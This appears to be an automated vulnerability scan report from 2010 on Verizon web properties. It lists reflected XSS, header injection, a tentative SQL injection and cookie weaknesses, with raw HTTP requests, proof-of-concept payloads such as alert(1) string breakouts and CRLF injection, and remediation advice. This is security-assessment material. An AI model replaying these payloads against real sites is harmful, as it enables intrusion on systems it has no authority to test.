3.290. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

3.291. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

3.292. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]

3.293. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

3.294. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

3.295. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]

3.296. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

3.297. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

3.298. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]

3.299. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

3.300. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

3.301. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]

3.302. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzapps cookie]

3.303. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [ECSPCookies cookie]

3.304. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [VzApps cookie]

4. SSL cookie without secure flag set

4.1. https://www36.verizon.com/fiostv/web/Signin.aspx

4.2. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

4.3. https://www36.verizon.com/fiosvoice/

5. Cookie without HttpOnly flag set

5.1. http://www2.verizon.net/help/dsl_settings/

5.2. http://www2.verizon.net/micro/speedtest/hsi/

5.3. http://www35.vzw.com/HG

5.4. https://www36.verizon.com/fiostv/web/Signin.aspx

5.5. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

6. Password field with autocomplete enabled

7. Cross-domain Referer leakage

7.1. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

7.2. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

7.3. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

8. Cross-domain script include

8.1. http://www22.verizon.com/Residential/HighSpeedInternet/

8.2. http://www22.verizon.com/Residential/HighSpeedInternet/Overview/

8.3. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm

8.4. http://www22.verizon.com/Residential/aboutFiOS/

9. Email addresses disclosed

10. Cacheable HTTPS response

10.1. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

10.2. https://www36.verizon.com/fiosvoice/terms/Terms_of_Service.pdf

10.3. https://www36.verizon.com/fiosvoice/userguide/User_Guide.pdf

11. HTML does not specify charset

11.1. http://www2.verizon.net/help/dsl_settings/

11.2. http://www35.vzw.com/HG

12. Content type is not specified

12.1. http://www36.verizon.com/fiostv

12.2. https://www36.verizon.com/fiostv



1. SQL injection

Summary

Severity:   High
Confidence:   Tentative
Host:   https://activate.verizon.net
Path:   /vasonly/AboutYourself.do

Issue detail

The gender parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gender parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

POST /vasonly/AboutYourself.do;EPIFREESESSIONID=r12cMnqcBQ56FnnVPC4dLj14FwxV2V7JnX2pT7DGKc3rPKHcmylG!757931108!-644176158 HTTP/1.1
Host: activate.verizon.net
Connection: keep-alive
Referer: https://activate.verizon.net/vasonly/start?type=consumer
Cache-Control: max-age=0
Origin: https://activate.verizon.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2Fshop%2FshopRedirect.aspx%3Foid%3DVX765; ActualProtectedResource=http://surround.verizon.net/shop/shopRedirect.aspx?oid=VX765; EPIFREESESSIONID=r12cMnqcBQ56FnnVPC4dLj14FwxV2V7JnX2pT7DGKc3rPKHcmylG!757931108!-644176158
Content-Length: 202

custType=consumer&firstName=%27&middleName=%27&lastName=%27%27&gender=male'&btn1=666&btn2=666&btn3=6666&address1=%27&address2=++&address3=%27&city=%27&state=AK&zipcode=10010&faxNumber=&buttonpressed=next

Response 1

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:17:05 GMT
Server: Apache
Content-Length: 1568
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<HEAD>


<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<META name="GENERATOR" content="IBM WebSp
...[SNIP]...
<form name="errors_form" id="vzform" method="post" action="/vasonly/Error.do">
...[SNIP]...

Request 2

POST /vasonly/AboutYourself.do;EPIFREESESSIONID=r12cMnqcBQ56FnnVPC4dLj14FwxV2V7JnX2pT7DGKc3rPKHcmylG!757931108!-644176158 HTTP/1.1
Host: activate.verizon.net
Connection: keep-alive
Referer: https://activate.verizon.net/vasonly/start?type=consumer
Cache-Control: max-age=0
Origin: https://activate.verizon.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2Fshop%2FshopRedirect.aspx%3Foid%3DVX765; ActualProtectedResource=http://surround.verizon.net/shop/shopRedirect.aspx?oid=VX765; EPIFREESESSIONID=r12cMnqcBQ56FnnVPC4dLj14FwxV2V7JnX2pT7DGKc3rPKHcmylG!757931108!-644176158
Content-Length: 202

custType=consumer&firstName=%27&middleName=%27&lastName=%27%27&gender=male''&btn1=666&btn2=666&btn3=6666&address1=%27&address2=++&address3=%27&city=%27&state=AK&zipcode=10010&faxNumber=&buttonpressed=next

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Nov 2010 02:17:06 GMT
Server: Apache
Location: https://activate.verizon.net/vasonly/Tell_us_about_yourself.jsp
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 321

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://activate.verizon.net/vason
...[SNIP]...

2. HTTP header injection

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into the Location response header. The payload 468b3%0d%0ae6a869cb573 was submitted in the goto parameter. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAW&clientId=myvz&goto=468b3%0d%0ae6a869cb573 HTTP/1.1
Host: auth.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 02:15:45 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
X-dsameversion: 7 2005Q4 patch5 (Tue Feb 27 17:18:03 2007) SunOS
Am_client_type: genericHTML
Location: https://www22.verizon.com/myverizon/?session=n&goto=468b3
e6a869cb573

Set-cookie: JSESSIONID=551CF2532820EFDFFF319A43015D9990;Path=/
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcyLSw2AprZCxoQFFnJupN9A%2FsDZ3JgYIpY%3D%40AAJTSQACNjkAAlMxAAIwMw%3D%3D%23;Domain=.verizon.com;Path=/
Set-cookie: amlbcookie=03;Domain=.verizon.com;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close


3. Cross-site scripting (reflected)
There are 304 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. https://auth.verizon.com/amserver/UI/Login [goto parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8af9a"%3b4024f132588 was submitted in the goto parameter. This input was echoed as 8af9a";4024f132588 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAW&clientId=myvz&goto=https%3A%2F%2Fwww22.verizon.com%3A443%2FForYourHome%2FMyAccount%2FProtected%2FServices%2FMyServices.aspx8af9a"%3b4024f132588 HTTP/1.1
Host: auth.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:21 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=EHCLJDFBFEEGFCIFCBIGJOAL; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:20:21 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129007

<!-- Vignette V6 Fri Nov 19 18:15:20 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
   window.location.href="http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx8af9a";4024f132588";
}

function fnSetSessionCookie(name,value,path,domain){
   document.cookie=name+"="+escape(value)+((path)?";path="+path:"")+((domain)?";domain="+domain:"");
}
var strRemOpt="";
var strMyVzCom=f
...[SNIP]...

3.2. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 923dc(a)cae14d5df3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal923dc(a)cae14d5df3e/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 02:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=W9dBMnxLblXyp1zMxmh9xXJ5sJ1GhL2yjvRdnpn3RyX2zx0WJDnJ!-1644393018; path=/

Resource /SMBPortal923dc(a)cae14d5df3e/smb could not be resolved for locale null.

3.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0137(a)ec58675ea9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbc0137(a)ec58675ea9d?_nfpb=true&_pageLabel=SMBPortal_page_main_overview HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 02:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=p9nBMnxLqJjc3gBG3N24ptCcfRyVf0J3mPQ12GZLG8XXhFcry8CR!-486484779; path=/

Resource /SMBPortal/smbc0137(a)ec58675ea9d could not be resolved for locale null.

3.4. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68173'-alert(1)-'ec88b63ed46 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview68173'-alert(1)-'ec88b63ed46 HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 02:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=2rdQMnxHQgCxhM1gq2pGyQJ8zfDdQyG9qXsqLLdVZtv4TTjqCpGk!1459926814; path=/
Content-Length: 112563

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
hHeaderText");
           
       if(searchFlow != null && searchFlow == "Shop")
           searchBox = document.getElementById("searchShopHeaderText");    
       
       var f_pageDefLabel = 'SMBPortal_page_main_overview68173'-alert(1)-'ec88b63ed46';
       if (f_pageDefLabel != "SMBPortal_page_SignIn")
           searchBox.focus();
   }
   
   onload = focusIt;
   // end WR 61703
   
</script>
...[SNIP]...

3.5. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do

Issue detail

The value of the serviceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ea0c'%3balert(1)//5fb68b88c27 was submitted in the serviceId parameter. This input was echoed as 1ea0c';alert(1)//5fb68b88c27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do?route=evaluateServiceId HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
Cache-Control: max-age=0
Origin: https://enterprisecenter.verizon.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; ED_SESSIONID=KxTbMnyP2zr9LhVwBk93rzd6dKK0TBqL2ZNYgJg4qC0TFgJwDMP5!2085112158!-2093491878; pref_lang=en-US; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; BusinessUnit=business
Content-Length: 481

